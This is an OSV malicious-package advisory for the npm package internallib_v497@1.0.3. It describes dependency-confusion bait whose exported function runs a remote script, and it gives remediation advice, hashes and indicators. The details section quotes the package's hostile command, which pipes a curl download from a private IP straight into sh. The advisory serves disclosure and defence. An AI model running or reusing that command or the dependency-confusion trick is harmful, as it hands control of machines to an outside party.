MAL-2026-16438

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v497/MAL-2026-16438.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-16438
Aliases
  • GHSA-94q5-67r5-mwjx
Published
2026-09-23T01:42:16Z
Modified
2026-09-23T20:30:05Z
Summary
Malicious code in internallib_v497 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (37d367008a98c6bac6f9018de18ff5a75917cad3031c6bca1e7d4e5e257d3505)

npm package internallib_v497@1.0.3 ships an index.js that exports a function which shell-executes curl http://10.0.5.109/shell.sh | sh via child_process.exec('/bin/bash -c...'), fetching an unauthenticated script over plain HTTP from a private RFC1918 address and piping it to a shell. Any consumer that requires the module and invokes the exported command() runs whatever code is served at 10.0.5.109 on the installer host. The package.json additionally declares its own name internallib_v497 as a dependency (^1.0.0), matching the classic dependency-confusion bait shape: an organization that maintains a private package by this name and resolves it from the public npm registry will pull this artifact and execute its payload.

Source: ghsa-malware (c249c697a7f4493519fe0bcc28ae8850e97fb0b70c3742ab2f880f89919852b3)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020328",
            "import_time":  "2026-09-23T01:50:19.28293437Z",
            "modified_time":  "2026-09-23T01:42:16Z",
            "sha256":  "37d367008a98c6bac6f9018de18ff5a75917cad3031c6bca1e7d4e5e257d3505",
            "source":  "amazon-inspector",
            "versions":  [
                "1.0.3"
            ]
        },
        {
            "id":  "GHSA-94q5-67r5-mwjx",
            "import_time":  "2026-09-23T20:26:30.517260862Z",
            "modified_time":  "2026-09-23T20:20:55Z",
            "ranges":  [
                {
                    "events":  [
                        {
                            "introduced":  "0"
                        }
                    ],
                    "type":  "SEMVER"
                }
            ],
            "sha256":  "c249c697a7f4493519fe0bcc28ae8850e97fb0b70c3742ab2f880f89919852b3",
            "source":  "ghsa-malware"
        }
    ]
}
References
Credits

Affected packages

npm / internallib_v497

Package

Name
internallib_v497
View open source insights on deps.dev
Purl
pkg:npm/internallib_v497

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected

Affected versions

1.*
1.0.3

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    },
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "index.js",
            "sha256":  "d3cfe1e8c78520a894a8015e250d4d581c9e1d0c32ad5dd335b307e3782f4234",
            "tlsh":  "a0c0c0cd01b80b30f35420f1ec61dc31b8438cd0321800f0d05844400c0100e336f0e6"
        },
        {
            "path":  "package.json",
            "sha256":  "4efdb17a6c47e4fd55b02e2375bb09811f5161e967da4262ac4a3bb960749784",
            "tlsh":  "3dd05e2059625d7321ca136e2d6984537261ce2f4056bc0d57cb5d2c41cf6b39cfd35c"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "internallib_v497-1.0.3.tgz",
            "hashes":  {
                "sha1":  "f09fbe20f9ae01eae3eddff55fe2346a44af8a6b",
                "sha512_sri":  "sha512-rAOssUutQUkWIiR45cBaFJFmGp5c2dWkZikWfvya3ppnqRQDTWiW76zZZMD+lMp5USNoZ+s4ubqKjsDZMrH3rw=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v497/MAL-2026-16438.json"